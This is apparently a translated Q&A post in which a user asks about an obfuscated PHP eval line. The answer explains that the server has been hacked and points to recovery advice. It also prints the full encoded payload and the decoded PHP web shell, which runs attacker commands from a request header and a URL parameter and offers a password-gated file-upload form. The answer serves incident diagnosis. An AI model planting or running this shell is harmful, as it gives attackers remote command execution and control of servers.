有人可以解释一下这段代码的效果是什么:
的eval(gzinflate(str_rot13(BASE64_DECODE( 'DdHJZaJAAADQX8ktQWQAISzWWSVyUAdOAU6WhliKpUwEpExx8esn7xfe1 + E / L0WSNzzHza5rSI + 8iSe8G6fhdOimPbdY4hELHz8ZQbsM794x0ZOwNxaooVyjPDqIt16eNJbkEyo0fMZegybPsQ + FSvKaE4xNv6Za7cURokS3tgFbjtIzVaJECOXQcc / HRO9oVHY9iTSnq58 / F + HUuSBxTiWIVrAZ6ZW9kYle2YPOTrxXE2KGRSDzmsC113CcKRnd3asSrIEwz2gh8uz3zJTKvHFXy5YPz1Uti1xshTfomvsGFyUW6ray21bNtpgwI6UmdkJV4Wk314QUgjH32JAkfbBhuvp3kcD + oiOz7MetE3w / litBrktQNC5nZOpGyYrmV6kKVgZa02bImL6Zy4JRYKbqgM0xIS6X + Iy74fai3gvJgc9ItPKKC3wESZWwTWcEfGealUXmof1P + svlFWIU7hENqMO6YlDopKeX3kSGFVSSZufsjBq3CeH8RVlAB51qzzJLZMemFnabbHkAzgFoU / B2XAXsnqPgJjIheHq8REYvu + L3FpcNIh0FglectVd7SV8iIThgOtI22K5sfCqf9LwdyRi86hDaM2MPzHzLdToOPdO6664iqwHH9LL9XDD8evrYDv6DiDdLlHwGsuuDTdYhzYaBXSqRySX4 / ufX37evz / 8 ='))));
答案 0 :(得分:4)
您的服务器已被黑客入侵。有关恢复提示,请参阅https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server。此代码允许攻击者将他们想要的任何文件上传到您的服务器。它解码为:
<?php error_reporting(0); ?>
<?php system($_SERVER["HTTP_SHELL"]);
if ($_GET["x"]=="kaMtiEz") {
?>
<form method="POST" enctype="multipart/form-data" action="<?$_SERVER["PHP_SELF"]?>">
<input type="file" name="myFile"><input type="submit" name="ok" value="Upload">
</form>
<?php
if (isset($_POST["ok"]) && isset($_FILES["myFile"])) {
$file = $_FILES["myFile"]["tmp_name"];
$name = $_FILES["myFile"]["name"];
if (!move_uploaded_file($file, $name)) {
echo "Unable to upload file";
} else {
echo "File Uploaded...";
}
}
}
if (!empty($_GET["x"])) {
echo "<pre>";
system($_GET["x"]);
echo "Copyright 2011 by kaMtiEz - MagelangCyber Team ! d0nt rem0ve copyright if u real hax0r </pre>";
exit;
}
?>